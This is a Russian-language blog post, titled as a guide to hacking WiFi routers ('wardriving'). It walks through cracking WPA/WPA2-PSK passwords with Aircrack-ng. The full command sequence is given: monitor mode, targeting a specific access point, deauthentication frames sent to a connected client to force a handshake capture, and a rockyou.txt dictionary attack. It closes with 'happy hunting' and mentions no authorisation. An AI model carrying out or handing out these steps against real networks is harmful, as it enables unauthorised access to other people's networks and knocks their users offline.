пятница, 27 ноября 2020 г.

Взлом WiFi роутера (Wardriving)

Принцип взлома заключается в перехвате рукопожатия (зашифрованного методом WPA/WPA2-PSK) во время прохождения аутентификации клиента на WiFi роутере и дальнейшем подборе пароля по словарю. Для подобного рода взлома потребуется WiFi адаптер с возможностью работать в режиме мониторинга, а так же компьютер или виртуальная машина с ОС Linux и набор утилит из пакета Aircrack-ng. Из самых распространенных и не дорогих можно посоветовать адаптеры на чипах Atheros AR9271 и Ralink RT3070, которые можно приобрести на aliexpress. 

И так начнем. Для начала установим Aircrack-ng. Так как я использую Linux Ubuntu, то команда инсталляции будет следующей:

sudo apt install aircrack-ng

Переводим адаптер в режим мониторинга. Это можно проделать двумя способами - системными утилитами ip, iw или утилитой airmon-ng из пакета Aircrack-ng. Рассмотрим первый способ. Для этого нужно ввести несколько команд. Подключаем наш адаптер и смотрим его название и режим:

iw dev

Вывод консоли будет примерно следующим:

Затем его нужно выключить командой:

sudo ip link set wlan0 down

Далее переключаем адаптер в режим мониторинга:

sudo iw dev wlan0 set type monitor

И обратно включаем его:

sudo ip link set wlan0 up

где wlan0 - название вашего WiFi адаптера. Еще раз смотрим режим адаптера той же командой:

iw dev

Теперь ваш адаптер в режиме мониторинга. Рассмотрим второй способ переключения режима. Это делается двумя командами. Сначала прибиваем мешающие процессы:

sudo airmon-ng check kill

Затем переводим в режим мониторинга:

sudo airmon-ng start wlan0

Вот и все :) Далее нам нужно посмотреть доступные точки доступа. Для этого воспользуемся командой:

sudo airodump-ng wlan0

Вывод будет примерно следующим:

Теперь выбираем WiFi точку, которую будем взламывать, копируем BSSID этой точки и запускаем мониторинг.

sudo airodump-ng --bssid 90:72:40:11:A0:CA -c 11 -w ./wificarck/semeyaka wlan0

где
-c 11 это номер канала радиоточки
-w ./wificarck/semeyaka это префикс файлов, куда будут сохраняться данные перехвата

Результат команды будет примерно такой:

Параллельно в соседнем терминале запускаем перехват WPA/WPA2 рукопожатия, делается это командой:

sudo aireplay-ng -a 90:72:40:11:A0:CA -c C6:F6:C5:E9:C3:97 -0 50  wlan0

где
-a 90:72:40:11:A0:CA это BSSID точки доступа
-c C6:F6:C5:E9:C3:97 это MAC адрес клиента подключенного к этой точке
-0 50 это количество попыток деаутентификации
Вывод будет примерно следующим:

При успешном перехвате рукопожатия выводится сообщение:

WPA handshake: BSSID

В результате у нас сохраняются файлы перехвата:

Нас интересует файл semeyaka-N.cap, в нем содержится зашифрованный пароль от точки доступа. Для подбора этого пароля необходимы файлы со словарями, их можно скачать отсюда https://github.com/danielmiessler/SecLists/tree/master/Passwords

Теперь все готово для перебора паролей, для этого запускаем команду:

aircrack-ng -b 90:72:40:11:A0:CA  -w ./passwords/rockyou.txt ./semeyaka-01.cap

где
-b 90:72:40:11:A0:CA это BSSID точки доступа
-w ./passwords/rockyou.txt путь к словарю с паролями
./semeyaka-03.cap файл с перехваченным рукопожатием
Процесс перебора будет примерно такой:

Если пароль подобран, то утилита сообщит об этом сообщением вида:

KEY FOUND! [ 987654321 ]

На этом все. Удачной охоты :)

Комментариев нет:

Отправить комментарий